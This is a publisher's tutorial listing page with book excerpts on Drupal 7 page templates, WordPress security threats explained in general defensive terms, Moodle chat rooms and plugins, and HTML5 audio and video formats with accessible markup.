Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Web Development

1797 Articles
article-image-drupal-7-themes-dynamic-theming
Packt
05 Jul 2011
11 min read
Save for later

Drupal 7 Themes: Dynamic Theming

Packt
05 Jul 2011
11 min read
  Drupal 7 Themes Create new themes for your Drupal 7 site with a clean layout and powerful CSS styling Designating a separate Admin theme Let's start with one of the simplest techniques, that is, designating a separate theme for the use of your admin interface. The Drupal 7 system comes bundled with the Seven theme, which is purpose-built for use by the administration interface. Seven is assigned as your site's admin theme by default. You can, however, change to any theme you desire. Changing the admin theme is done directly from within the admin system's Theme Manager. To change the admin theme, follow these steps: Log in and access your site's admin system. Select the Appearance option from the Management menu. After the Theme Manager loads in your browser, scroll down to the bottom of the page. You can see at the bottom of that page a combo box labeled Administration theme, as shown in the following screenshot. Select the theme you desire from the combo box. Click Save configuration, and your selected theme should appear immediately. The Administration theme combo box will display all the enabled themes on your site. If you don't see what you want listed in the combo box, scroll back up, and make sure you have enabled the theme you desire. If the theme you desire is not listed in the Theme Manager, you will need to install it first! Additionally note the option listed below the Administration theme combo box: Use the administration theme when editing or creating content. Though this option is enabled by default, you may want to de-select this option. If you de-select the option, the system will use the frontend theme for content creation and editing. In some cases, this is more desirable as it allows you to see the page in context, instead of inside the admin theme. It provides, in other words, a more realistic view of the final content item. Using multiple page templates Apart from basic blog sites, most websites today employ different page layouts for different purposes. In some cases this is as simple as one layout for the home page and another for the internal pages. Other sites take this much further and deliver different layouts based on content, function, level of user access, or other criteria. There are various ways you can meet this need with Drupal. Some of the approaches are quite simple and can be executed directly from the administration interface; others require you to work with the files that make up your Drupal theme. Creative use of configuration and block assignments can address some needs. Most people, however, will need to investigate using multiple templates to achieve the variety they desire. The bad news is that there is no admin system shortcut for controlling multiple templates in Drupal—you must manually create the various templates and customize them to suit your needs. The good news is that creating and implementing additional templates is not terribly difficult and is it possible to attain a high degree of granularity with the techniques described next. Indeed should you be so inclined, you could literally define a distinct template for each individual page of your site! While there are many good reasons for running multiple page templates, you should not create additional templates solely for the purpose of disabling regions to hide blocks. While the approach will work, it will result in a performance hit for the site, as the system will still produce the blocks, only to then wind up not displaying them for the pages. The better practice is to control your block visibility through the Blocks Manager. Drupal employs an order of precedence, implemented using a naming convention. You can unlock the granularity of the system through proper application of the naming convention. It is possible, for example, to associate templates with every element on the path, or with specific users, or with a particular functionality or node type—all through the simple process of creating a copy of the existing template and then naming it appropriately. In Drupal terms, this is called creating template suggestions. When the system detects multiple templates, it prefers the specific to the general. If the system fails to find multiple templates, it will apply the relevant default template from the Drupal core. The fundamental methodology of the system is to use the most specific template file it finds and ignore other, more general templates. This basic principle, combined with proper naming of the templates, gives you control over the template that will be applied in various situations. The default suggestions provided by the Drupal system should be sufficient for the vast majority of theme developers. However, if you find that you need additional suggestions beyond those provided by the system, it is possible to extend your site and add new suggestions. See http://drupal.org/node/190815 for an example of this advanced Drupal theming technique. Let's take a series of four examples to show how this system feature can be employed to provide solutions to common problems: Use a unique template for your site's home page Use a different template for a group of pages Assign a specific template to a specific page Designate a specific template for a specific user Creating a unique home page template Let's assume that you wish to set up a unique look and feel for the home page of a site. The ability to employ different appearance for the home page and the interior pages is one of the most common requests web developers hear. There are several techniques you can employ to achieve the result; which is right for you depends on the extent and nature of the variation required, and to a lesser extent, upon the flexibility of the theme you presently employ. For many people a combination of the techniques will be used. Another factor to consider is the abilities of the people who will be managing and maintaining the site. There is often a conflict between what is easiest for the developers and what will be easiest for the site administrators. You need to keep this in mind and strive to create manageable structures. It is, for example, much easier for a client to manage a site that populates the home page dynamically, then to have to create content in multiple places and remember to assign things in the proper fashion. In this regard, using dedicated templates for the home page is generally preferable. One option to address this issue is the creative use of configuration and assignment. You can achieve a degree of variety within a theme—without creating dedicated templates—by controlling the visibility and positioning of the blocks on the home page. Another option you may want to consider is using a contributed module to assist with this task. The Panels and Views modules in particular are quite useful for assembling complex home page layouts. See Useful Extensions for Themers for more information on these extensions. If configuration and assignment alone do not give you enough flexibility, you will want to consider using a dedicated template that is purpose-built for your home page content. To create a dedicated template for your home page, follow these steps: Access the Drupal installation on your server. Copy your theme's existing page.tpl.php file (if your theme does not have a page.tpl.php file, then copy the default page.tpl.php file from the folder /modules/system). Paste it back in the same directory as the original file and rename it page--front.tpl.php. Make any changes you desire to the new page--front.tpl.php. Save the file. Clear the Drupal theme cache. That's it—it's really that easy. The system will now automatically display your new template file for the site's home page, and use the default page.tpl.php for the rest of the site. Note that page--front.tpl.php will be applied to whatever page you specify as the site's front page using the site configuration settings. To override the default home page setting visit the Site Information page from the Configuration Manager. To change the default home page, enter the path of the page you desire to use as the home page into the field labeled Default home page. Next, let's use the same technique to associate a template with a group of pages. The file naming syntax has changed slightly in Drupal 7. In the past, multiple words contained in a file name were consistently separated with a single hyphen. In Drupal 7, a single hyphen is only used for compound words; a double hyphen is used for targeting a template. For example, page--front.tpl.php uses the double hyphen as it indicates that we are targeting the page template when displayed for the front page. In contrast, maintenance-page.tpl.php shows the single hyphen syntax, as it is a compound name. Remember, suggestions only work when placed in the same directory as the base template. In other words, to get page--front.tpl.php to work, you must place it in the same directory as page.tpl.php. Using a different template for a group of pages You can provide a template to be used by any distinct group of pages. The approach is the same as we saw in the previous section, but the name for the template file derives from the path for the pages in the group. For example, to theme the pages that relate to users, you would create the template page--user.tpl.php. A note on templates and URLs Drupal bases the template order of precedence on the default path generated by the system. If the site is using a module like Pathauto, that alters the path that appears to site visitors, remember that your templates will still be displayed based on the original paths. The exception here being page--front.tpl.php, which will be applied to whatever page you specify as the site's front page using the site's Configuration Manager. The following table presents a list of suggestions you can employ to theme various pages associated with the default page groupings in the Drupal system: The steps involved in creating a template-specific theme to a group of pages is the same as that used for the creation of a dedicated home page template: Access the Drupal installation on your server. Copy your theme's existing page.tpl.php file (if your theme does not have a page.tpl.php file, then copy the default page.tpl.php file from the folder /modules/system). Paste it back in the same directory as the original file and rename it as shown in the table above, for example page--user.tpl.php. Make any changes you desire to the new template. Save the file. Clear the Drupal theme cache. Note that the names given in the table above will set the template for all the pages within the group. If you need a more granular solution—that is, to create a template for a sub-group or an individual page within the group, see the discussion in the following sections. Assigning a specific template to a specific page Taking this to its extreme, you can associate a specific template with a specific page. By way of example, assume we wish to provide a unique template for a specific content item. Let's assume the page you wish to style is located at http://www.demosite.com/node/2. The path of the page gives you the key to the naming of the template you need to style it. In this case, you would create a copy of the page.tpl.php file and rename it to page--node--2.tpl.php. Using template suggestion wildcards One of the most interesting changes in Drupal 7 is the introduction of template suggestion wildcards. In the past, you would have to specify the integer value for individual nodes, for example, page--user--1.tpl.php. If you wished to also style the pages for the entire group of users, you had the choice of either creating page--user.tpl.php, that affects all user pages, including the login forms, or you would be forced to create individual templates to cover each of the individual users. With Drupal 7 we can now simply use a wildcard in place of the integer values, for example, page--user--%.tpl.php. The new template page--user--%.tpl.php will now affect all the individual user pages without affecting the login pages. Designating a specific template for a specific user Assume that you want to add a personalized theme for the user with the ID of 1 (the first user in your Drupal system, and for many sites, the ID used by the super user). To do this, copy the existing page.tpl.php file, rename it to reflect its association with the specific user, and make any changes to the new file. To associate the new template file with the user, name the file: page—-user--1.tpl. Now, when the user with ID=1 logs into the site, they will be presented with this template. Only user 1 will see this template and only when he or she is logged in and visiting the user page.
Read more
  • 0
  • 0
  • 2110

article-image-wordpress-3-security-risks-and-threats
Packt
04 Jul 2011
11 min read
Save for later

WordPress 3 Security: Risks and Threats

Packt
04 Jul 2011
11 min read
  WordPress 3 Ultimate Security Protect your WordPress site and its network         Read more about this book       (For more resources on WordPress, see here.) You may think that most of this is irrelevant to WordPress security. Sadly, you'd be wrong. Your site is only as safe as the weakest link: of the devices that assist in administering it or its server; of your physical security; or of your computing and online discipline. To sharpen the point with a simple example, whether you have an Automattic-managed wordpress.com blog or unmanaged dedicated site hosting, if a hacker grabs a password on your local PC, then all bets are off. If a hacker can borrow your phone, then all bets are off. If a hacker can coerce you to a malicious site, then all bets are off. And so on. Let's get one thing clear. There is no such thing as total security and anyone who says any different is selling something. Then again, what we can achieve, given ongoing attention, is to boost our understanding, to lock our locations, to harden our devices, to consolidate our networks, to screen our sites and, certainly not least of all, to discipline our computing practice. Even this carries no guarantee. Tell you what though, it's pretty darned tight. Let's jump in and, who knows, maybe even have a laugh here and there to keep us awake. Calculated risk So what is the risk? Here's one way to look at the problem: RISK = VULNERABILITY x THREAT A vulnerability is a weakness, a crack in your armour. That could be a dodgy wireless setup or a poorly coded plugin, a password-bearing sticky note, or an unencrypted e-mail. It could just be the tired security guy. It could be 1001 things, and then more besides. The bottom line vulnerability though, respectfully, is our ignorance. A threat, on the other hand, is an exploit, some means of hacking the flaw, in turn compromising an asset such as a PC, a router, a phone, your site. That's the sniffer tool that intercepts your wireless, the code that manipulates the plugin, a colleague that reads the sticky, whoever reads your mail, or the social engineer who tiptoes around security. The risk is the likelihood of getting hacked. If you update the flawed plugin, for instance, then the threat is redundant, reducing the risk. Some risk remains because, when a further vulnerability is found there will be someone, somewhere, who will tailor an exploit to threaten it. This ongoing struggle to minimize risk is the cat and mouse that is security. To minimize risk, we defend vulnerabilities against threats. You may be wondering, why bother calculating risk? After all, any vulnerability requires attention. You'd not be wrong but, such is the myriad complexity of securing multiple assets, any of which can add risk to our site, and given that budgets or our time are at issue, we need to prioritize. Risk factoring helps by initially flagging glaring concerns and, ideally assisted by a security policy, ensuring sensible ongoing maintenance. Securing a site isn't a one-time deal. Such is the threatscape, it's an ongoing discipline.   An overview of our risk Let's take a WordPress site, highlight potential vulnerabilities, and chew over the threats. WordPress is an interactive blogging application written in PHP and working in conjunction with a SQL database to store data and content. The size and complexity of this content manager is extended with third party code such as plugins and themes. The framework and WordPress sites are installed on a web server and that, the platform, and its file system are administered remotely. WordPress. Powering multi-millions of standalone sites plus another 20 million blogs at wordpress.com, Automattic's platform is an attack target coveted by hackers. According to wordpress.org 40% of self-hosted sites run the gauntlet with versions 2.3 to 2.9. Interactive. Just being online, let alone offering interaction, sites are targets. A website, after all, is effectively an open drawer in an otherwise lockable filing cabinet, the server. Now, we're inviting people server-side not just to read but to manipulate files and data. Application, size, and complexity. Not only do applications require security patching but, given the sheer size and complexity of WordPress, there are more holes to plug. Then again, being a mature beast, a non-custom, hardened WordPress site is in itself robust. PHP, third party code, plugins, and themes. Here's a whole new dynamic. The use of poorly written or badly maintained PHP and other code adds a slew of attack vectors. SQL database. Containing our most valuable assets, content and data, MySQL, and other database apps are directly available to users making them immediate targets for hackers. Data. User data from e-mails to banking information is craved by cybercriminals and its compromise, else that of our content, costs sites anything from reputation to a drop or ban in search results as well as carrying the remedial cost of time and money. Content and media. Content is regularly copied without permission. Likewise with media, which can also be linked to and displayed on other sites while you pay for its storage and bandwidth. Upload, FTP, and private areas provide further opportunities for mischief. Sites. Sites-plural adds risk because a compromise to one can be a compromise to all. Web server. Server technologies and wider networks may be hacked directly or via WordPress, jeopardizing sites and data, and being used as springboards for wider attacks. File system. Inadequately secured files provide a means of site and server penetration. Administered remotely. Casual or unsecured content, site, server, and network administration allows for multi-faceted attacks and, conversely, requires discipline, a secure local working environment, and impenetrable local-to-remote connectivity.   Meet the hackers This isn't some cunning ploy by yours-truly to see for how many readers I can attain visitor's rights, you understand. The fact is to catch a thief one has to think like one. Besides, not all hackers are such bad hats. Far from it. Overall there are three types-white hat, grey hat, and black hat-each with their sub-groups. White hat One important precedent sets white hats above and beyond other groups: permission. Also known as ethical hackers, these decent upstanding folks are motivated: To learn about security To test for vulnerabilities To find and monitor malicious activity To report issues To advise others To do nothing illegal To abide by a set of ethics to not harm anyone So when we're testing our security to the limit, that should include us. Keep that in mind. Black hat Out-and-out dodgy dealers. They have nefarious intent and are loosely sub-categorized: Botnets A botnet is a network of automated robots, or scripts, often involved in malicious activity such as spamming or data-mining. The network tends to be comprised of zombie machines, such as your server, which are called upon at will to cause general mayhem. Botnet operators, the actual black hats, have no interest in damaging most sites. Instead they want quiet control of the underlying server resources so their malbots can, by way of more examples, spread malware or Denial of Service (DoS) attacks, the latter using multiple zombies to shower queries to a server to saturate resources and drown out a site. Cybercriminals These are hackers and gangs whose activity ranges from writing and automating malware to data-mining, the extraction of sensitive information to extort or sell for profit. They tend not to make nice enemies, so I'll just add that they're awfully clever. Hacktivists Politically-minded and often inclined towards freedom of information, hacktivists may fit into one of the previous groups, but would argue that they have a justifiable cause. Scrapers While not technically hackers, scrapers steal content-often on an automated basis from site feeds-for the benefit of their generally charmless blog or blog farms. Script kiddies This broad group ranges anything from well-intentioned novices (white hat) to online graffiti artists who, when successfully evading community service, deface sites for kicks. Armed with tutorials galore and a share full of malicious warez, the hell-bent are a great threat because, seeking bragging rights, they spew as much damage as they possibly can. Spammers Again not technically hackers but this vast group leeches off blogs and mailing lists to promote their businesses which frequently seem to revolve around exotic pharmaceutical products. They may automate bomb marketing or embed hidden links but, however educational their comments may be, spammers are generally, but not always, just a nuisance and a benign threat. Misfits Not jargon this time, this miscellaneous group includes disgruntled employees, the generally unloved, and that guy over the road who never really liked you. Grey hat Grey hatters may have good intentions, but seem to have a knack for misplacing their moral compass, so there's a qualification for going into politics. One might argue, for that matter, that government intelligence departments provide a prime example. Hackers and crackers Strictly speaking, hackers are white hat folks who just like pulling things apart to see how they work. Most likely, as kids, they preferred Meccano to Lego. Crackers are black or grey hat. They probably borrowed someone else's Meccano, then built something explosive. Over the years, the lines between hacker and cracker have become blurred to the point that put-out hackers often classify themselves as ethical hackers. This author would argue the point but, largely in the spirit of living language, won't, instead referring to all those trying to break in, for good or bad, as hackers. Let your conscience guide you as to which is which instance and, failing that, find a good priest.   Physically hacked off So far, we have tentatively flagged the importance of a safe working environment and of a secure network from fingertips to page query. We'll begin to tuck in now, first looking at the physical risks to consider along our merry way. Risk falls into the broad categories of physical and technical, and this tome is mostly concerned with the latter. Then again, with physical weaknesses being so commonly exploited by hackers, often as an information-gathering preface to a technical attack, it would be lacking not to mention this security aspect and, moreover, not to sweet-talk the highly successful area of social engineering. Physical risk boils down to the loss or unauthorized use of (materials containing) data: Break-in or, more likely still, a cheeky walk-in Dumpster diving or collecting valuable information, literally from the trash Inside jobs because a disgruntled (ex-)employee can be a dangerous sort Lost property when you leave the laptop on the train Social engineering which is a topic we'll cover separately, so that's ominous Something just breaks ... such as the hard-drive Password-strewn sticky notes aside, here are some more specific red flags to consider when trying to curtail physical risk: Building security whether it's attended or not. By the way, who's got the keys? A cleaner, a doorman, the guy you sacked? Discarded media or paper clues that haven't been criss-cross shredded. Your rubbish is your competitor's profit. Logged on PCs left unlocked, unsecured, and unattended or with hard drives unencrypted and lacking strong admin and user passwords for the BIOS and OS. Media, devices, PCs and their internal/external hardware. Everything should be pocketed or locked away, perhaps in a safe. No Ethernet jack point protection and no idea about the accessibility of the cable beyond the building. No power-surge protection could be a false economy too. This list is not exhaustive. For mid-sized to larger enterprises, it barely scratches the surface and you, at least, do need to employ physical security consultants to advise on anything from office location to layout as well as to train staff to create a security culture. Otherwise, if you work in a team, at least, you need a policy detailing each and every one of these elements, whether they impact your work directly or indirectly. You may consider designating and sub-designating who is responsible for what and policing, for example, kit that leaves the office. Don't forget cell and smart phones and even diaries.  
Read more
  • 0
  • 0
  • 2614

article-image-wordpress-3-security-overall-risk-site-and-server
Packt
04 Jul 2011
7 min read
Save for later

WordPress 3 Security: Overall Risk to Site and Server

Packt
04 Jul 2011
7 min read
  WordPress 3 Ultimate Security Protect your WordPress site and its network         Read more about this book       (For more resources on WordPress, see here.) How proactive we can be depends on our hosting plan. Then again, harping back to my point about security’s best friend—awareness—even Automattic bloggers could do with a heads-up. Just as site and server security each rely on the other, this section mixes the two to outline the big picture of woe and general despair. The overall concern isn’t hard to grasp. The server, like any computer, is a filing cabinet. It has many drawers—or ports—that each contain the files upon which a service (or daemon) depends. Fortunately, most drawers can be sealed, welded shut, but are they? Then again, some administrative drawers, for instance containing control panels, must be accessible to us, only to us, using a super-secure key and with the service files themselves providing no frailty to assist forcing an entry. Others, generally in our case the web files drawer, cannot even be locked because, of course, were it so then no one could access our sites. To compound the concern, there’s a risk that someone rummaging about in one drawer can internally access the others and, from there, any networked cabinets. Let's break down our site and server vulnerabilities, vying them against some common attack scenarios which, it should be noted, merely tip the iceberg of malicious possibility. Just keep smiling.   Physical server vulnerabilities Just how secure is the filing cabinet? We’ve covered physical security and expanded on the black art of social engineering. Clearly, we have to trust our web hosts to maintain the data center and to screen their personnel and contractors. Off-server backup is vital.   Open ports with vulnerable services We manage ports, and hence differing types of network traffic, primarily with a firewall. That allows or denies data packets depending on the port to which they navigate. FTP packets, for example, navigate to the server’s port 21. The web service queues up for 80. Secure web traffic—https rather than http—heads for 443. And so on. Regardless of whether or not, say, an FTP server is installed, if 21 is closed then traffic is denied. So here’s the problem. Say you allow an FTP service with a known weakness. Along comes a hacker, exploits the deficiency and gains a foothold into the machine, via its port. Similarly, every service listening on every port is a potential shoo-in for a hacker. Attacking services with a (Distributed) Denial of Service attack Many in the blogging community will be aware of the Digg of death, a nice problem to have where a post’s popularity, duly Digged, leads to a sudden rush of traffic that, if the web host doesn’t intervene and suspend the site, can overwhelm server resources and even crash the box. What’s happened here is an unintentional denial of service, this time via the web service on port 80. As with most attacks, DoS attacks come in many forms but the malicious purpose, often concentrated at big sites or networks and sometimes to gain a commercial or political advantage, is generally to flood services and, ultimately, to disable HTTP. As we introduced earlier, the distributed variety are most powerful, synchronizing the combined processing power of a zombie network, or botnet, against the target.   Access and authentication issues In most cases, we simply deny access by disabling the service and closing its port. Many of us, after all, only ever need web and administration ports. Only? Blimey! Server ports, such as for direct server access or using a more user-friendly middleman such as cPanel, could be used to gain unwanted entry if the corresponding service can be exploited or if a hacker can glean your credentials. Have some typical scenarios. Buffer overflow attacks This highly prevalent kind of memory attack is assisted by poorly written software and utilizes a scrap of code that’s often introduced through a web form field or via a port-listening service, such as that dodgy FTP daemon mentioned previously. Take a simplistic example. You’ve got a slug of RAM in the box and, on submitting data to a form, that queues up in a memory space, a buffer, where it awaits processing. Now, imagine someone submits malicious code that's longer, containing more bits, than the programmer allowed for. Again, the data queues in its buffer but, being too long, it overflows, overwriting the form’s expected command and having itself executed instead. So what about the worry of swiped access credentials? Again, possibilities abound. Intercepting data with man-in-the-middle attacks The MITM is where someone sits between your keystrokes and the server, scouring the data. That could be, for example, a rootkit, a data logger, a network, or a wireless sniffer. If your data transits unencrypted, in plain text, as is the case with FTP or HTTP and commonly with e-mail, then everything is exposed. That includes login credentials. Cracking authentication with password attacks Brute force attacks, on the other hand, run through alphanumeric and special character combinations against a login function, such as for a control panel or the Dashboard, until the password is cracked. They’re helped immensely when the username is known, so there’s a hint not to use that regular old WordPress chestnut, admin. Brute forcing can be time-consuming, but can also be coordinated between multiple zombies, warp-speeding the process with the combined processing power. Dictionary attacks, meanwhile, throw A-Z word lists against the password and hybrid attacks morph brute force and dictionary techniques to crack naïve keys such as pa55worD. The many dangers of cross-site scripting (XSS) XSS crosses bad code—adds it—with an unsecured site. Site users become a secondary target here because when they visit a hacked page, and their browser properly downloads everything as it resolves, they retrieve the bad code to become infected locally. An in-vogue example is the iframe injection which adds a link that leads to, say, a malicious download on another server. When a visitor duly views the page, downloading it locally, malware and all, the attacker has control over that user’s PC. Lovely. There's more. Oh so much more. Books more in fact. There's too much to mention here, but another classic tactic is to use XSS for cookie stealing. ... All that’s involved here is a code injection to some poor page that reports to a log file on the hacker’s server. Page visitors have their cookies chalked up to the log and have their session hijacked, together with their session privileges. If the user’s logged into webmail, so can the hacker. If it’s online banking, goodbye to your funds. If the user’s a logged-in WordPress administrator, you get the picture. Assorted threats with cross-site request forgery (CSRF) This is not the same as XSS, but there are similarities, the main one being that, again, a blameless if poorly built site is crossed with malicious code to cause an effect. A user logs into your site and, in the regular way, is granted a session cookie. The user surfs some pages, one of them having been decorated with some imaginative code from an attacker which the user’s browser correctly downloads. Because that script said to do something to your site and because the unfortunate user hadn’t logged out of your site, relinquishing the cookie, the action is authorized by the user’s browser. What may happen to your site, for example, depends on the user’s privileges so could vary from a password change or data theft to a nice new theme effect called digital soup.  
Read more
  • 0
  • 0
  • 1142
Visually different images

article-image-moodle-history-teaching-using-chats-books-and-plugins
Packt
29 Jun 2011
4 min read
Save for later

Moodle: History Teaching using Chats, Books and Plugins

Packt
29 Jun 2011
4 min read
The Chat Module Students naturally gravitate towards the Chat module in Moodle. It is one of the modules that they effortlessly use whilst working on another task. I often find that they have logged in and are discussing work related tasks in a way that enables them to move forward on a particular task. Another use for the Chat module is to conduct a discussion outside the classroom timetabled lesson when students know that you are available to help them with issues. This is especially relevant to students who embark on study leave in preparation for examinations. It can be a lonely and stressful period. Knowing that they can log in to a chat that has been planned in advance means that they can prepare issues that they wish to discuss about their workload and find out how their peers are tackling the same issues. The teacher can ensure that the chat stays on message and provide useful input at the same time. Setting up a Chatroom We want to set up a chat with students who are on holiday but have some examination preparation to do for a lesson that will take place straight after their return to school. Ideally we would have informed the students prior to starting their holiday that this session would be available to anyone who wished to take part. Log in to the Year 7 History course and turn on editing In the Introduction section, click the Add an activity dropdown Select Chat Enter an appropriate name for the chat Enter some relevant information in the Introduction text Select the date and time for the chat to begin Beside Repeat sessions select No repeats – publish the specified time only Leave other elements at their default settings Click Save changes The following screenshot is the result of clicking Add an activity from the drop-down menu: If we wanted to set up the chatroom so that the chat took place at the same time each day or each week then it is possible to select the appropriate option from the Repeat sessions dropdown. The remaining options make it possible for students to go back and view sessions that they have taken part in. Entering the chatroom When a student or teacher logs in to the course for the appointed chat they will see the chat symbol in the Introduction section. Clicking on the symbol enables them to enter the chatroom via a simple chat window or a more accessible version where checking the box ensures that only new messages appear on the screen as shown in the following screenshot: As long as another student or teacher has entered the chatroom, a chat can begin when users type a message and await a response. The Chat module is a useful way for students to collaborate with each other and with their teacher if they need to. It comes into its own when students are logging in to discuss how to make progress with their collaborative wiki story about a murder in the monastery or when students preparing for an examination share tips and advice to help each other through the experience. Collaboration is the key to effective use of the chat module and teachers need not fear its potential for timewasting if this point is emphasized in the activities that they are working on. Plugins A brief visit to www.moodle.org and a search for ‘plugins’ reveals an extensive list of modules that are available for use with Moodle but stand outside the standard installation. If you have used a blogging tool such as Wordpress you will be familiar with the concept of plugins. Over the last few years, developers have built up a library of plugins which can be used to enhance your Moodle experience. Every teacher has different ways of doing things and it is well worth exploring the plugins database and related forums to find out what teachers are using and how they are using it. There is for example a plugin for writing individual learning plans for students and another plugin called Quickmail which enables you to send an email to everyone on your course even more quickly than the conventional way. Installing plugins Plugins need to be installed and they need administrator rights to run at all. The Book module for example, requires a zip file to be downloaded from the plugins database onto your computer and the files then need to be extracted to a folder in the Mod folder of your Moodle’s software directory. Once it is in the correct folder, the administrator then needs to run the installation. Installation has been successful if you are able to log in to the course and see the Book module as an option in the Add a resource dropdown.
Read more
  • 0
  • 0
  • 1654

article-image-html5-audio-and-video-elements
Packt
28 Jun 2011
9 min read
Save for later

HTML5: Audio and Video Elements

Packt
28 Jun 2011
9 min read
Understanding audio and video file formats There are plenty of different audio and video file formats. These files may include not just video but also audio and metadata—all in one file. These file types include: .avi – A blast from the past, the Audio Video Interleave file format was invented by Microsoft. Does not support most modern audio and video codecs in use today. .flv – Flash video. This used to be the only video file format Flash fully supported. Now it also includes support for .mp4. .mp4 or .mpv – MPEG4 is based on Apple's QuickTime player and requires that software for playback. How it works... Each of the previously mentioned video file formats require a browser plugin or some sort of standalone software for playback. Next, we'll look at new open-source audio and video file formats that don't require plugins or special software and the browsers that support them. H.264 has become of the most commonly used high definition video formats. Used on Blu-ray Discs as well as many Internet video streaming sites including Flash, iTunes Music Store, Silverlight, Vimeo, YouTube, cable television broadcasts, and real-time videoconferencing. In addition, there is a patent on H.264 is therefore, by definition, not open source. Browsers that support H.264 video file format include: Google has now partially rejected the H.264 format and is leaning more toward its support of the new WebM video file format instead. Ogg might be a funny sounding name, but its potential is very serious, I assure you. Ogg is really two things: Ogg Theora, which is a video file format; and Ogg Vorbis, which is an audio file format. Theora is really much more of a video file compression format than it is a playback file format, though it can be used that way also. It has no patents and is therefore considered open source. Fun fact: According to Wikipedia, "Theora is named after Theora Jones, Edison Carter's controller on the Max Headroom television program." Browsers that support the Ogg video file format include: WebM is the newest entrant in the online video file format race. This open source audio/video file format development is sponsored by Google. A WebM file contains both an Ogg Vorbis audio stream as well as a VP8 video stream. It is fairly well supported by media players including Miro, Moovidia, VLC, Winamp, and more, including preliminary support by YouTube. The makers of Flash say it will support WebM in the future, as will Internet Explorer 9. Browsers that currently support WebM include: There's more... So far this may seem like a laundry list of audio and video file formats with spotty browser support at best. If you're starting to feel that way, you'd be right. The truth is no one audio or video file format has emerged as the one true format to rule them all. Instead, we developers will often have to serve up the new audio and video files in multiple formats while letting the browser decide whichever one it's most comfortable and able to play. That's a drag for now but here's hoping in the future we settle on fewer formats with more consistent results. Audio file formats There are a number of audio file formats as well. Let's take a look at those. AAC – Advanced Audio Coding files are better known as AACs. This audio file format was created by design to sound better than MP3s using the same bitrate. Apple uses this audio file format for its iTunes Music Store. Since the AAC audio file format supports DRM, Apple offers files in both protected and unprotected formats. There is an AAC patent, so by definition we can't exactly call this audio file format open source. All Apple hardware products, including their mobile iPhone and iPad devices as well as Flash, support the AAC audio file format. Browsers that support AAC include: MP3 – MPEG-1 Audio Layer 3 files are better known as MP3s. Unless you've been hiding under a rock, you know MP3s are the most ubiquitous audio file format in use today. Capable of playing two channels of sound, these files can be encoded using a variety of bitrates up to 320. Generally, the higher the bitrate, the better the audio file sounds. That also means larger file sizes and therefore slower downloads. There is an MP3 patent, so by definition we can't exactly call this audio file format open source either. Browsers that support MP3 include: Ogg – We previously discussed the Ogg Theora video file format. Now, let's take a look at the Ogg Vorbis audio format. As mentioned before, there is no patent on Ogg files and are therefore considered open source. Another fun fact: According to Wikipedia, "Vorbis is named after a Discworld character, Exquisitor Vorbis in Small Gods by Terry Pratchett." File format agnosticism We've spent a lot of time examining these various video and audio file formats. Each has its own plusses and minuses and are supported (or not) by various browsers. Some work better than others, some sound and look better than others. But here's the good news: The new HTML5 <video> and <audio> elements themselves are file-format agnostic! Those new elements don't care what kind of video or audio file you're referencing. Instead, they serve up whatever you specify and let each browser do whatever it's most comfortable doing. Can we stop the madness one day? The bottom line is that until one new HTML5 audio and one new HTML5 video file format emerges as the clear choice for all browsers and devices, audio and video files are going to have to be encoded more than once for playback. Creating accessible audio and video In this section we will pay attention to those people who rely on assistive technologies. How to do it... First, we'll start with Kroc Camen's "Video for Everybody" code chunk and examine how to make it accessibility friendly to ultimately look like this: <div id="videowrapper"> <video controls height="360" width="640"> <source src="__VIDEO__.MP4" type="video/mp4" /> <source src="__VIDEO__.OGV" type="video/ogg" /> <object width="640" height="360" type="application/ x-shockwave-flash" data="__FLASH__.SWF"> <param name="movie" value="__FLASH__.SWF" /> <param name="flashvars" value="controlbar=over&amp; image=__POSTER__.JPG&amp;file=__VIDEO__.MP4" /> <img src="__VIDEO__.JPG" width="640" height="360" alt="__TITLE__" title="No video playback capabilities, please download the video below" /> </object> <track kind="captions" src="videocaptions.srt" srclang="en" /> <p>Final fallback content</p> </video> <div id="captions"></div> <p><strong>Download Video:</strong> Closed Format: <a href="__VIDEO__.MP4">"MP4"</a> Open Format: <a href="__VIDEO__.OGV">"Ogg"</a> </p> </div> How it works... The first thing you'll notice is we've wrapped the new HTML5 video element in a wrapper div. While this is not strictly necessary semantically, it will give a nice "hook" to tie our CSS into. <div id="videowrapper"> Much of the next chunk should be recognizable from the previous section. Nothing has changed here: <video controls height="360" width="640"> <source src="__VIDEO__.MP4" type="video/mp4" /> <source src="__VIDEO__.OGV" type="video/ogg" /> <object width="640" height="360" type="application/ x-shockwave-flash" data="__FLASH__.SWF"> <param name="movie" value="__FLASH__.SWF" /> <param name="flashvars" value="controlbar=over&amp; image=__POSTER__.JPG&amp;file=__VIDEO__.MP4" /> <img src="__VIDEO__.JPG" width="640" height="360" alt="__TITLE__" title="No video playback capabilities, please download the video below" /> </object> So far, we're still using the approach of serving the new HTML5 video element to those browsers capable of handling it and using Flash as our first fallback option. But what happens next if Flash isn't an option gets interesting: <track kind="captions" src="videocaptions.srt" srclang="en" /> What the heck is that, you might be wondering. "The track element allows authors to specify explicit external timed text tracks for media elements. It does not represent anything on its own." - W3C HTML5 specification Here's our chance to use another new part of the HTML5 spec: the new <track> element. Now, we can reference the type of external file specified in the kind="captions". As you can guess, kind="captions" is for a caption file, whereas kind="descriptions" is for an audio description. Of course the src calls the specific file and srclang sets the source language for the new HTML5 track element. In this case, en represents English. Unfortunately, no browsers currently support the new track element. Lastly, we allow one last bit of fallback content in case the user can't use the new HTML5 video element or Flash when we give them something purely text based. <p>Final fallback content</p> Now, even if the user can't see an image, they'll at least have some descriptive content served to them. Next, we'll create a container div to house our text-based captions. So no browser currently supports closed captioning for the new HTML5 audio or video element, we'll have to leave room to include our own: <div id="captions"></div> Lastly, we'll include Kroc's text prompts to download the HTML5 video in closed or open file formats: <p><strong>Download Video:</strong> Closed Format: <a href="__VIDEO__.MP4">"MP4"</a> Open Format: <a href="__VIDEO__.OGV">"Ogg"</a> </p>
Read more
  • 0
  • 0
  • 1494

article-image-gnu-octave-data-analysis-examples
Packt
28 Jun 2011
7 min read
Save for later

GNU Octave: data analysis examples

Packt
28 Jun 2011
7 min read
